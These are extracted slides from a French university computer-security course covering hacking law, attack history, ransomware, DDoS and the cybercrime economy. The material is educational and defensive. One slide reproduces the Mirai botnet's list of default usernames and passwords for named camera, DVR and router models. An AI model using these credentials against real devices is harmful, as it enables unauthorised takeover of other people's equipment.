0% ont trouvé ce document utile (0 vote)

402 vues506 pages

Cours Securite Admisys

Transféré par

Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.

Formats disponibles

Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

0% ont trouvé ce document utile (0 vote)

402 vues506 pages

Cours Securite Admisys

Transféré par

Abdoul Kader Adamou Moussa

Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.

Formats disponibles

Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Sécurité Informatique

[Link]@[Link]

November 28, 2021

[Link]@[Link] Sécurité Informatique/ November 28, 2021 1 / 506

"Tu es fort petit, très fort, mais tant que je serais dans
le métier, tu ne seras jamais que le second."
The MASK

[Link]@[Link] Sécurité Informatique/ November 28, 2021 2 / 506

Pirater n’est pas un jeu

Ce que vous apprendrez ici est destiné à la protection, pas à

l’attaque. Mais si cela vous amuse :
Certains organismes "anodins" sont sous la protection de la
DGSI ou moins conciliant..
Quand vous réussissez à pirater un organisme c’est parce que
Il ne fait pas de sécurité
Il a une bonne sécurité, mais avec une faille. Il a donc des
journaux qu’il analyse.
Vous avez piraté un Honeypot. Bravo vous êtes sous
microscope.
Accord international G8-24
Gel de situation de police à police,
Regularisation judiciaire par la suite.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 3 / 506

Dura Lex Sed Lex

Accès et maintien :
Pénal : Art 323-1 : 30 000 e, 2 ans de prison
si en plus altération : 45 000 e, 3 ans de prison
si en plus STAD de l’état : 75 000 e, 5 ans de prison
Entrave au système d’information :
Pénal : Art 323-2 : 75 000 e, 5 ans de prison.
si en plus STAD de l’état : 100 000 e, 7 ans de prison
Possession d’outils de piratage :
Pénal : peines identiques aux infractions "possibles".

[Link]@[Link] Sécurité Informatique/ November 28, 2021 4 / 506

Dura Lex Sed Lex : résumé

Pour résumer
"Pas vu, Pas pris
Vu : Niqué !"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 5 / 506

Phrases essentielles

"Some rules can be bent,others.... can be broken."Morpheus

"Ne pas croire ce que l’on te dit. Toujours re-vérifier" Gibbs
règle n°3
"Ne jamais rien prendre pour acquis" Gibbs règle n°8
"L’homme intelligent résoud les problèmes, l’homme sage les
évite"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 6 / 506

Quel est l’objectif de la sécurité informatique ?

Protéger l’infrastructure informatique ?

Assurer son intégrité ?
Assurer sa confidentialité ?
Assurer sa disponibilité ?
Assurer son auditabilité ?
Empêcher les accès aux utilisateurs ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 7 / 506

En-êtes vous sûrs ?

Quelqu’un diffuse du phishing sous votre nom :

Notion d’image
Perte de marchés
Et pourtant aucun "dégât informatique"
Alors que l’on peut réduire le risque informatiquement
Vol / Destruction d’un serveur ?
Protection physique (est-ce votre rôle ?)
Sauvegarde

[Link]@[Link] Sécurité Informatique/ November 28, 2021 8 / 506

Le bon objectif

Protéger l’entreprise
Y compris sa version non informatique
Par des moyens informatiques
Si vous n’en êtes pas convaincus, essayez d’en convaincre vos
interlocuteurs.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 9 / 506

Comment faire

Evaluer
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?
Définir les rôles : politique de sécurité
Qui fait quoi, comment et quand ?
Qui peut faire quoi, comment et quand ?
Définir un plan d’action
Quelle sont les priorités ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 10 / 506

Évaluer

Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
attention les menaces internes ne représentent que de 1 à 7 %
des attaques.
La sécurité se mesure-t-elle ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 11 / 506

Les difficultés

Génère des désagréments

L’empêcheur de surfer en rond.
Beaucoup de travail
Nécessite de fortes compétences
en réseau, en système, en droit, et une remise à niveau
permanente
Coûte de l’argent
et ne rapporte rien
Pas de reconnaissance
Si ça marche : "A quoi ça sert ?"
Sinon : "Vous êtes nul !"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 12 / 506

Le contexte : Internet

Historique
Connexion de bout en bout
Réseau ouvert

[Link]@[Link] Sécurité Informatique/ November 28, 2021 13 / 506

Historique

1962 : Réseau militaire

1968 : Premiers tests réseau à paquets
1 Octobre 1969 Arpanet(RFC,UNIX)
Septembre 1978 : IPv4
1991 : Création de WWW par Tim Lee Werners
1992 : Découverte d’Internet par le grand public

[Link]@[Link] Sécurité Informatique/ November 28, 2021 14 / 506

Connexion de bout en bout

les RFC 1122 et 1123 définissent les règles pour les machines
Accessibilité totale
On fait ce que l’on dit, et l’on dit ce que l’on fait
Signaler quand cela ne marche pas
Signaler pourquoi
Système ouvert
Finger
Rexec
Sendmail

[Link]@[Link] Sécurité Informatique/ November 28, 2021 15 / 506

Réseau ouvert

Entraide : prêt de ressources

Sendmail → relayage de spams
DNS → saturation de serveurs distants
Assistance au débogage
EXPN et VRFY de sendmail → collecte d’informations
XFER DNS → cartographie de réseaux

[Link]@[Link] Sécurité Informatique/ November 28, 2021 16 / 506

Les risques

Destruction de données
Perte de marchés
Perte de temps et donc d’argent
Risques juridiques

[Link]@[Link] Sécurité Informatique/ November 28, 2021 17 / 506

Destruction de données

Comptabilité
Données clients
R & D, Conception, Production
Les PME meurent dans les 3 mois.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 18 / 506

Perte de marché

Vol ou divulgation d’information

Recherche et développement
Fichier client
Dégradation de l’image
Modification du site web
Divulgation d’informations
Perte de confiance

[Link]@[Link] Sécurité Informatique/ November 28, 2021 19 / 506

Pertes financière et boursière

Exemple de Yahoo

[Link]@[Link] Sécurité Informatique/ November 28, 2021 20 / 506

Pertes financière et boursière

Mais ce n’est pas toujours le cas

[Link]@[Link] Sécurité Informatique/ November 28, 2021 21 / 506

Pertes financière et boursière

Cause ou conséquence ?

[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 22 / 506

Perte de temps et donc d’argent

Arrêt de la production
Recherche des causes
Remise en état

[Link]@[Link] Sécurité Informatique/ November 28, 2021 23 / 506

Risques juridiques

Lois françaises
Échanges illégaux (terrorisme/pédopornographie/P2P),
Attaques par rebond,
Confidentialité des données personnelles (Article 226-17 et
Article 226-34),
Loi européenne
GDPR / RGPD (Règlement européen : 25 Mai 2018).
2 à 4% du chiffre d’affaire mondial
10-20 Mepour les administrations
Les résultats du RGPD
Contrats
Disponibilité
Lois internationales
Loi Sarbanes-Oxley (US)
Réglementation Bâle II

[Link]@[Link] Sécurité Informatique/ November 28, 2021 24 / 506

Les menaces : attaques

Historique
Niveau des attaques
Types d’attaque
Déroulement d’une attaque

[Link]@[Link] Sécurité Informatique/ November 28, 2021 25 / 506

Les attaques : pré-historique

1975 : Jon Postel pressent le SPAM

→ 1983 : blagues de potaches
1983 : Wargames
Août 1986 : Cukoo’s egg (1989) Clifford Stoll : 1er Honeypot.
(0.75$)
2 Novembre 1988 : Ver de Morris
10% du parc mondial (6000 sur 60000)
Création du CERT

[Link]@[Link] Sécurité Informatique/ November 28, 2021 26 / 506

Le vocabulaire officiel

Le vocabulaire officiel en cybersécurité

[Link]@[Link] Sécurité Informatique/ November 28, 2021 27 / 506

Les attaques : historique

2001 : Code Rouge

24 janvier 2003 : Slammer/Sapphire
(376 octets)
doublait toutes les 2,5 secondes
90% des hôtes vulnérables infectés en 10 minutes
2004 : Location de zombies
2008 : Les Anonymous commencent leurs attaques

[Link]@[Link] Sécurité Informatique/ November 28, 2021 28 / 506

Les attaques : contemporain

2009 : Conficker (7%, Militaire, 250 K$, MD6).

2010 : Opération Aurora, Mariposa (13 M), Comodo, Stuxnet.
2011 : Affaire DigiNoTar (certificat *.[Link]),
2012 : Pacemakers, Piratage de l’Élysée,
2013 : PRISM (Snowden), Backdoor DLink
2014 : Début des cryptolocker, Shellshock(98), Sony, FIN4,
Failles SSL (Poodle, Heartbleed, etc., etc.)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 29 / 506

Les attaques : contemporain 2

2015 : Cyberdjihadisme, Hacking Team, Full HTTPS, Ashley

Madison, Backdoor Cisco,
2016 : DNC, Méga DDos, IoT, Shadow Brokers,
2017 : Cryptominers, Equifax, Accenture, AWS public bucket,
Wannacry
2018 : Meltdown et consorts, les bibliothèques
(event-stream), memcached et DDoS,
2019 : Année ransomware. Russie contrôle son Internet. Les
certificats EV deviennent inutiles, Cryptostealer (voleur de
cybermonnaie).
2020 : Les VPN sont piratés, faille Zerologon, 1 portefeuille
bitcoin de 1 milliard de $ vidé, Encrochat, SolarWind.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 30 / 506

Ashley Madison

Site d’adultère, 36 millions d’utilisateurs

Piraté le 15 juillet 2015 par Impact Team Wikipédia
300 Go de données (nom, mail (pro souvent), mot de passe,
adresse, paiements effectués)
11 millions de mots de passe chiffrés avec un salted MD5
5,5 millions de femmes. 70529 bots féminins (43 bots
masculins)
Pour plus d’information sur le système Ashley-Madison
Thomas Ryan et l’expérience Robin Sage (25 ans et 10 ans
d’expérience).

[Link]@[Link] Sécurité Informatique/ November 28, 2021 31 / 506

Les attaques et événements : 2021

Rapport du FBI sur le CyberCrime

300 000 -> 800 000 plaintes
600 M$ perdus dans de fausses romances sur le web.
194 M$ dans les fuites de données.
Les ransomwares n’auraient coûté en rançons "que" 29 M$.
Voir plus bas.
Faille SolarWinds
Faille Proxylogon sur les serveurs Exchange
Groupe Hafnium
Attroupement des autres groupes.
Nouveau record de rançongiciel : 50 M€ pour Acer
Faille Trickboot sur du matériel supermicro.
Record de deni de service (voir plus bas)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 32 / 506

Les attaques et événements : 2021

ChaosDB des milliers de base Microsoft Cosmo DB

ProxyToken qui permet de contourner les authentifications
Microsoft
Fuite T-mobile 100 millions de comptes dans la nature
La cybersecurité de la commission européenne hackée
PolyNetworks 600 millions de $ volés et restitués.
Gigabytes 112 Go de données volées.
Pegasus et l’espionnage d’individus par NSO avec la faille
0day 0clickForcedentry
Explication sur la backdoor Juniper de 2015 Backdoor CIA de
2008 utilisée par les chinois en 2012 puis 2014.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 33 / 506

Les attaques "rigolotes"
Le capteur luminosité utilisé pour détecter la timezone d’un
client web
Les capteurs d’orientation des smartphone pour deviner vos
mots de passe
IOS fitness pulsation cardiaque/ validant les achats grâce à la
lecture "au dessus" de l’empreinte digitale
Détecter le mot de passe par les mouvements d’épaule dans
Zoom ou Teams.
Piratage d’une ceinture de chasteté
Faire un copier coller piégé
Planquer un virus dans la mémoire des cartes graphiques
Macron et son dossier vaccination COVID
Un câble USB espion.
Pirater le 2FA par SMS grâce ... aux voitures
Cette personne n’existe pas
[Link]@[Link] Sécurité Informatique/ November 28, 2021 34 / 506
Le phénomène Cryptolocker

Le modèle passe de "Tata Jacotte" au "Big Game Hunting"

(actuellement 17 M$ pour Compal)
Norsk Hydro se fait rançonner, et cela lui coûte 46 M$
Altran (AD, cryptolocker + 1 M$ de rançon) se font pirater
Arrêt de Fleury Michon, l’université de Corse, CHU de Rouen
(250K€), Université de Brest.
Sopra Steria, réputée pour sa capacité en cybersécurité, limite
les dégâts, mais cela lui coutera entre 40 et 50M$ pour revenir
à un état correct,
Pierre Fabre et les 25 millions d’euros de rançon
Déplacement latéral, accès AD, destruction des snapshots et
sauvegarde

[Link]@[Link] Sécurité Informatique/ November 28, 2021 35 / 506

Le phénomène Cryptolocker 2

Groupes "Etatiques" pour de l’argent: TA505 (Iran)par

exemple.
3500 extensions différentes des cryptolockeurs.
Arrêt de 3 semaines à plusieurs mois.
Chiffrement de base de données Mysql
Ajout de chantage à l’exposition des données.
Apparition de société style Coveware
On passe, entre l’arrivée et la prise de contrôle complète, de
72 heures à 2 heures
Un très intéressant retour de Ouest-France
Vidéo: Faut-il payer ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 36 / 506

Le phénomène cryptolocker: l’argent

Le top en terme de rançon: 34 millions de dollars pour

FoxConn
Une étude estime à 350 millions de $ les revenus en 2020

[Link]@[Link] Sécurité Informatique/ November 28, 2021 37 / 506

Hacktivisme

[Link]@[Link] Sécurité Informatique/ November 28, 2021 38 / 506

Hacktivisme

[Link]@[Link] Sécurité Informatique/ November 28, 2021 39 / 506

Hacktivisme

[Link]@[Link] Sécurité Informatique/ November 28, 2021 40 / 506

Hacktivisme

[Link]@[Link] Sécurité Informatique/ November 28, 2021 41 / 506

Hacktivisme

[Link]@[Link] Sécurité Informatique/ November 28, 2021 42 / 506

Les attaques : en temps réel

[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 43 / 506

Les attaques : en temps différé

[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 44 / 506

Les attaques : en temps différé

[Link]@[Link] Sécurité Informatique/ November 28, 2021 45 / 506

Les attaques : en temps différé 2

[Link]@[Link] Sécurité Informatique/ November 28, 2021 46 / 506

Niveau des attaques

Niveau

Fast Flux

Phishing Crypto High tech

Attaques distribuées Réseau C&C P2P

Attaques web
Interface graphique
Obfuscation
Maquillage de paquets Déni de service

Exploration de réseau (scan) Techniques furtives

Utilisation de SNMP

Désactivation des journaux

Détournement de sessions

Backdoor

Exploitation de vulnérabilités connues

Décryptage de mot de passe
Code Auto-répliquant

Essai de mots de passe

1980 1985 1990 1995 2005 2010 2015

[Link]@[Link] Sécurité Informatique/ November 28, 2021 47 / 506

Type des attaquants : par compétence

Script Kiddy
90% playstation 9% clickomane 1% intelligence
utilise ce que font les autres
Amateur
Failles connues
Failles web
Professionnel
En équipe
Avec beaucoup de moyens (financiers, techniques, parfois
préparatoires)
0days possibles, voire courants.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 48 / 506

Type des attaquants : par objectif

L’argent
piratage volumétrique
cryptolocker/cryptominage
Hacktiviste
"Terroriste"
Anonymous
Espions
Etatique
Industriel
"Petit con"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 49 / 506

Évolution des attaquants

Ne pas se méprendre
Si la moyenne des pirates est plus bête qu’avant,
les meilleurs pirates sont bien meilleurs qu’avant
plus psychologues (Social Engineering, virus)
plus pragmatiques (Efficacité, Argent)
plus techniques.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 50 / 506

Compétences des pros

Voici, selon un rapport de CrowdStrike de 2019 les performances

des pirates "non occidentaux" et soutenus par de gros sponsors.
Groupe Sponsor Temps d’intrusion
Bear (alias APT-28) Russie [Link]
Chollima (alias APT-38) Corée du Nord [Link]
Panda (alias PLA Unit 61398) Chine [Link]
Kitten (alias APT-34) Iran [Link]
Spider eCrime [Link]
Source [Link] performances
Source [Link] liste des groupes APT

[Link]@[Link] Sécurité Informatique/ November 28, 2021 51 / 506

But des attaques

Constitution d’un parc de zombies

Campagne de SPAMs (pourriel)
Campagne de phishing (hameçonnage)
Campagne de racket
Tag
Casse
Vol (codes bancaires, espionnage, marketing agressif)
Spyware, Keylogger, cryptolocker etc.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 52 / 506

Économie cybercrimininalité : version simplifiée

Pseudo Vol bancaire

Antivirus
Antivirus par keylogger

Chinese
TuringFarm
SCAM
Captcha
Piratage
Protection d’une
Serveur Web entreprise
Massmailing
Virus
Chantage
Phishing
crédibilisé
Bot
par mot de passe

PC Vol
d’identité Doxing

Usurpation
DDoS Racket

Déstabilisation
d’une entreprise Disparition
Pirate concurrent
Argent
Cryptolocker
Spam Viagra

Cryptominage

Spam Blog

Protection IP FAI
Firewall, Blacklist bullet proof
Intrusion
XSS
Serveur

Faux
Call Center
Site de
phishing
ou de vente
Site
médicaments
"WaterHole"

Faille Ver
Espionnage

Game Cracking

Jeu
Cheat

[Link]@[Link] Sécurité Informatique/ November 28, 2021 53 / 506

Économie Virale : quelques chiffres
Phreaking téléphonique : 2 000 - 70 000 epar attaque réussie.
en 2019, pour un investissement de 500 $ dans un RaaS, on
obtient 3000 $ en 3 mois.
30% des américains ont acheté après un spam.
ROI de "indian herbal" : coût 0,1 centimes, vendu 65 e.
Vol d’identité.
Perte estimée pour le vol d’une identité : 400 e(bénéfice pour
le pirate : entre 50 et 100 e))
en 2007, l’estimation des pertes dues à la cybercriminalité était
de plus de 1 milliard par an.
Depuis 2007 C.A. cybercriminalité >C.A. drogue. 2018 : 600
milliards $
Virus locky a rapporté 100 M$.
Le "RaaS" Gandcrab se retire après avoir fait payer 2 milliards
de $ aux victimes.
Le "Cheat" jeu vidéo rapporterait plus que la cybercriminalité
classique.
Pourquoi les sites porno et les sites proxy sont gratuits ?
[Link]@[Link] Sécurité Informatique/ November 28, 2021 54 / 506
Proposition d’emploi

et puis il y a Amazon Mechanical Turk

et puis il y a uncaptcha2 (pour que Google pirate Google)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 55 / 506

Proposition de services

[Link]@[Link] Sécurité Informatique/ November 28, 2021 56 / 506

Prix de failles

[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 57 / 506

Prix de failles mobile

[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 58 / 506

Type des attaques

Déni de service (saturation, D.O.S. ou D.D.O.S.)

Phishing (hameçonnage), spear phishing (harponnage).
Infection (cryptolocker, mots de passe bancaires).
Piratage web
Intrusion réseau (APT)
...

[Link]@[Link] Sécurité Informatique/ November 28, 2021 59 / 506

Attaque D.O.S.

Deny Of Service ou Déni de service. Plusieurs principes de

fonctionnement
Le harcèlement
Occupation permanente de la ligne
Le livreur de pizzas
Appel de plusieurs livreurs pour une fausse adresse
Voir backscatter pour le repérage
Le chewing gum dans la serrure

[Link]@[Link] Sécurité Informatique/ November 28, 2021 60 / 506

Attaque D.D.O.S.

Distributed Deny Of Service ou déni de service distribué.

D.O.S. appliqué par plusieurs (dizaines de milliers de)
machines
Généralement de type "livreur de pizzas", mais pas toujours
(les rps par exemple)
Rarement évitable (sauf par des sociétés internationales
spécialisées)
Volume maximal actuel :
1 Tbit/s (19 septembre 2016)
1.35 Tbit/s par de serveurs memcached (mars 2018)
2.5 Tbit/s sur Google en 2017 (annoncé en octobre 2020)
17,2 Mrps/s sur Cloudflare en Juillet 2021 par Meris
21,8 Mrps/s sur Yandex en Septembre 2021 par Meris
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 61 / 506

Evolution des DDoS

[Link]@[Link] Sécurité Informatique/ November 28, 2021 62 / 506

Déni de service contre akamaï avec memcached

source [Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 63 / 506

Type de D.O.S.

Saturation de la bande passante (UDP)

10000 zombies
Impossible de lutter seul (se "cacher" derrière OVH,
CloudFlare, etc.)
Saturation de la table des connexions (TCP)
1000 zombies
Lutte : utilisation des syncookies
Effet Slashdot / Reddit Hug of Death.
Saturation du nombre processus
100 zombies mais les machines sont "grillées", connaissance
minimale
Lutte : limitation du nombre de processus, repérage et blocage
très tôt

[Link]@[Link] Sécurité Informatique/ November 28, 2021 64 / 506

Type de D.O.S.

Saturation de la CPU
10 zombies mais les machines sont "grillées", connaissances
pointues
exemple: requêtes SQL massive
Lutte : limitation de la CPU (noyau), mod_evasive (http)
Plantage distant
1 zombie. Expertise nécessaire
Empoisonnement des caches CDN
Patch régulier, durcissement noyau, protection applicative

[Link]@[Link] Sécurité Informatique/ November 28, 2021 65 / 506

Et si kon ve fer mé kon sé pa

source http: // www. ddosservice. com

[Link]@[Link] Sécurité Informatique/ November 28, 2021 66 / 506

Piske ma copine me quitte, je DDoS

source
https: // pasillo. renater. fr/ weathermap/ weathermap_
metropole. html
[Link]@[Link] Sécurité Informatique/ November 28, 2021 67 / 506
La protection DDoS

Elle se prépare, comme toute gestion de crise.

Savoir ce que l’on est prêt à sacrifier (ou pas)
En terme de correspondants
En terme de services
Les procédures
Les concevoir (qui fait quoi comment, les interlocuteurs)
Les rédiger
Les valider

[Link]@[Link] Sécurité Informatique/ November 28, 2021 68 / 506

La protection DDoS

Elle est multi-niveaux

Volumétrique (FAI)
Connexion (Réseau)
Applicative (Développement)
Elle a ses risques propres
Perte localisée de connexion (syncookie)
Latence en régime de croisière (limites
CPU/process/RAM/disque)
Risque d’interception "high level" : cloudflare / OVH / etc.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 69 / 506

Pause TP : DDoS

Résumez en 5 lignes cette page web

[Link]
rapport-attaques-ddos-observees-par-ovh-en-2017/
Trouvez un tarif actuel pour du DDoS

[Link]@[Link] Sécurité Informatique/ November 28, 2021 70 / 506

Connaître pour de vrai les attaques: Mitre

source https: // attack. mitre. org

[Link]@[Link] Sécurité Informatique/ November 28, 2021 71 / 506

Mitre: sous catégorie

[Link]@[Link] Sécurité Informatique/ November 28, 2021 72 / 506

Mitre: explication

[Link]@[Link] Sécurité Informatique/ November 28, 2021 73 / 506

Mitre: un exemple d’APT

[Link]@[Link] Sécurité Informatique/ November 28, 2021 74 / 506

Déroulement d’attaque phishing

[Link]@[Link] Sécurité Informatique/ November 28, 2021 75 / 506

Déroulement d’attaque infection

[Link]@[Link] Sécurité Informatique/ November 28, 2021 76 / 506

Déroulement d’attaque infection / protection

[Link]@[Link] Sécurité Informatique/ November 28, 2021 77 / 506

Déroulement d’attaque infection contournement

[Link]@[Link] Sécurité Informatique/ November 28, 2021 78 / 506

Déroulement d’attaque intégration botnet

[Link]@[Link] Sécurité Informatique/ November 28, 2021 79 / 506

Déroulement d’attaque infection pour Spam/Virus

[Link]@[Link] Sécurité Informatique/ November 28, 2021 80 / 506

Déroulement d’attaque infection pour DDoS

[Link]@[Link] Sécurité Informatique/ November 28, 2021 81 / 506

Déroulement d’un piratage web

[Link]@[Link] Sécurité Informatique/ November 28, 2021 82 / 506

Déroulement d’un piratage réseau

[Link]@[Link] Sécurité Informatique/ November 28, 2021 83 / 506

Cryptolockeur simple

[Link]@[Link] Sécurité Informatique/ November 28, 2021 84 / 506

Cryptolockeur lourd

[Link]@[Link] Sécurité Informatique/ November 28, 2021 85 / 506

Déroulement d’une attaque intrusion

Collecte d’informations
Repérage des vulnérabilités
Utilisation des vulnérabilités → intrusion
Accession aux droits administrateur (escalade)
Camouflage
Installation d’une backdoor

[Link]@[Link] Sécurité Informatique/ November 28, 2021 86 / 506

Collecte des informations

Par "social engineering" ou manipulation psycho-relationnelle

Par ingénierie informationnelle
Par interrogation TCP/IP
Scan (de ports ou de machines)
Rapide/lent
Classique/furtif
Interrogation des services
Cartographie DNS
Récupération des versions
Récupération des options

[Link]@[Link] Sécurité Informatique/ November 28, 2021 87 / 506

Attaques : quelques statistiques à l’UT1

Ces chiffres sont des moyennes en 2020

1000 tests par seconde ( 170 millions par jour )
2 à 5 campagnes de phishing par jour.
Plus quelques pointes.
95 000 tests par seconde pendant 72 h en 2015
400 000 tests par seconde pendant 2 heures en 2019
450 000 tests par seconde pendant 20 minutes en 2020
150 000 tests par seconde pendant 7 minutes en septembre
2021
des pointes à 500 000 tests par seconde de septembre à
novembre 2021

[Link]@[Link] Sécurité Informatique/ November 28, 2021 88 / 506

Attaques : incidents à l’UT1
106 incidents de sécurité depuis 15 ans dont
1 cryptolocker
18 incidents de phishing
57 virus (sortants ou crypto) sur des postes
2 intrusions automatiques (vers) sur des serveurs
1 boite noire piratée (ShellShock)
2 "DDoS" réussis en Février 2015.
Année Total Virus Phishing Autres Commentaires
2021 7 0 0 7 Faille, DoS, HIBP
2020 13 4 0 9 Cryptolocker, HIBP
2019 22 8 2 12 Escroquerie, HIBP
2018 18 8 2 8 Piratage serveurs, HIBP
2017 8 3 4 1 Parasitisme avancé
2016 12 6 1 5 3 DoS, 2 extorsions
2015 16 8 4 4 2 DoS

[Link]@[Link] Sécurité Informatique/ November 28, 2021 89 / 506

Attaques : nombre mensuel de tests

RRDTOOL / TOBI OETIKER

Infractions sur 1 mois
200 k

100 k

0
ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven.

Infractions sortantes par seconde Infractions entrantes par seconde

[Link]@[Link] Sécurité Informatique/ November 28, 2021 90 / 506

Attaques : nombre d’attaquants

RRDTOOL / TOBI OETIKER

Quarantaine sur 1 mois
6 k

5 k

4 k

3 k

2 k

1 k

0
ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven.

Quarantaine en sortie par heure Quarantaine en entree par heure

[Link]@[Link] Sécurité Informatique/ November 28, 2021 91 / 506

Attaques : raisons de la quarantaine sur une journée

[Link]@[Link] Sécurité Informatique/ November 28, 2021 92 / 506

Mais en vrai, que vois-tu ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 93 / 506

Pourquoi les services sont vulnérables ?

Mauvaise conception (volontaire ou non)

Peace and Love : REXEC
Backdoor : FSP,EGGDrop
Incompétence : WEP
Complexité : OpenSSL, Bash, WPA2
Mauvaise configuration
postfix, DNS, HTTP
Mauvaise utilisation
Scripts php, cgi-bin incorrects
Mauvais utilisateurs
Clickophile
Manque d’intelligence entre la chaise et le clavier

[Link]@[Link] Sécurité Informatique/ November 28, 2021 94 / 506

Heureusement

C’est super dur de trouver des failles

[Link]@[Link] Sécurité Informatique/ November 28, 2021 95 / 506

Site de recensement de failles

sources:
https: // www. cvedetails. com ,https: // cve. mitre. org

[Link]@[Link] Sécurité Informatique/ November 28, 2021 96 / 506

Heureusement

C’est super dur de trouver comment exploiter des failles

[Link]@[Link] Sécurité Informatique/ November 28, 2021 97 / 506

Site d’utilisation de failles

source http: // www. exploit-db. com

[Link]@[Link] Sécurité Informatique/ November 28, 2021 98 / 506

Plus méchant : distribution de icepack

[Link]@[Link] Sécurité Informatique/ November 28, 2021 99 / 506

Heureusement

Les antivirus nous protègent.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 100 / 506

Les antivirus

Exemple de Virustotal

[Link]@[Link] Sécurité Informatique/ November 28, 2021 101 / 506

Quand ce n’est pas Google qui les héberge

[Link]@[Link] Sécurité Informatique/ November 28, 2021 102 / 506

M’en fous

je ne prends que des logiciels / codes / applications signés

[Link]@[Link] Sécurité Informatique/ November 28, 2021 103 / 506

Le code signing

source
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 104 / 506

Heureusement

Les entreprises informatiques savent faire

[Link]@[Link] Sécurité Informatique/ November 28, 2021 105 / 506

Vulnérabilités de septembre 2021

[Link]@[Link] Sécurité Informatique/ November 28, 2021 106 / 506

Vous voulez prendre le contrôle de caméras (Mirai)?

source [Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 107 / 506

Version plus lisible
Matériel Login Password
ACTi IP Camera admin 123456
ANKO Products DVR root anko
Axis IP Camera root pass
Dahua Camera root vizxv
Dahua DVR root 888888
Dahua DVR root 666666
Dahua IP Camera root 7ujMko0vizxv
Dahua IP Camera root 7ujMko0admin
Dahua IP Camera 666666 666666
Dreambox TV receiver root dreambox
EV ZLX Two-way Speaker root zlxx
Guangzhou Juan Optical root juantech
H.264 – Chinese DVR root xc3511
HiSilicon IP Camera root klv1234
HiSilicon IP Camera root jvbzd
IPX-DDK Network Camera root admin
IQinVision Cameras root system
Mobotix Network Camera admin meinsm
Packet8 VOIP Phone root 54321
Panasonic Printer root 00000000
RealTek Routers root realtek
Samsung IP Camera admin 1111111
Shenzhen Anran Security Camera root xmhdipc
SMC Routers admin smcadmin
Toshiba Network Camera root ikwb
Ubiquiti AirOS Router ubnt ubnt
VideoIQ supervisor supervisor
Vivotek IP Camera root <none>
Xerox printers admin 1111
ZTE Router root Zte521

[Link]@[Link] Sécurité Informatique/ November 28, 2021 108 / 506

Heureusement Microsoft nous protège

[Link]@[Link] Sécurité Informatique/ November 28, 2021 109 / 506

Microsoft et ses vulnérabilités

Liste des vulnérabilités

[Link]@[Link] Sécurité Informatique/ November 28, 2021 110 / 506

Microsoft vous protège du flash

Parce que Flash c’est, en moyenne, 60 vulnérabilités critiques

par an
Mais quand même Facebook, c’est des potes, comme
[Link]
[Link]
[Link]
et 54 autres sites.
source [Link]
source [Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 111 / 506

Heureusement j’ai Windows 10

[Link]@[Link] Sécurité Informatique/ November 28, 2021 112 / 506

Heureusement

Les grosses entreprises ne se font jamais pirater.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 113 / 506

Les plus grosses fuites de données

source http: // www. informationisbeautiful. net

[Link]@[Link] Sécurité Informatique/ November 28, 2021 114 / 506

Les plus grosses attaques ransomwares

source http: // www. informationisbeautiful. net

[Link]@[Link] Sécurité Informatique/ November 28, 2021 115 / 506

Ma banque elle, elle risque rien

[Link]@[Link] Sécurité Informatique/ November 28, 2021 116 / 506

Ma banque elle, elle risque rien

[Link]@[Link] Sécurité Informatique/ November 28, 2021 117 / 506

Les entreprises piratées assument

[Link]@[Link] Sécurité Informatique/ November 28, 2021 118 / 506

Les entreprises piratées assument

Un client du FAI VirginMedia demande une RAZ de son mot

de passe.
Virginmedia lui envoie son ancien mot de passe en clair par
mail !
Le client s’en offusque
Réponse :

Posting it to you is secure, as it’s illegal to open someone else’s

mail. JGS
— Virgin Media (virginmedia) August 17, 2019

Thank god criminals don’t break laws.

— Joseph Cox (josephfcox) August 17, 2019

[Link]@[Link] Sécurité Informatique/ November 28, 2021 119 / 506

Les entreprises piratées assument

[Link]@[Link] Sécurité Informatique/ November 28, 2021 120 / 506

Les entreprises piratées assument (2)

Un générateur d’excuses en bois

[Link]@[Link] Sécurité Informatique/ November 28, 2021 121 / 506

Mais il y a des sociétés d’experts

[Link]@[Link] Sécurité Informatique/ November 28, 2021 122 / 506

Mais il y a des sociétés d’experts

OSSIR

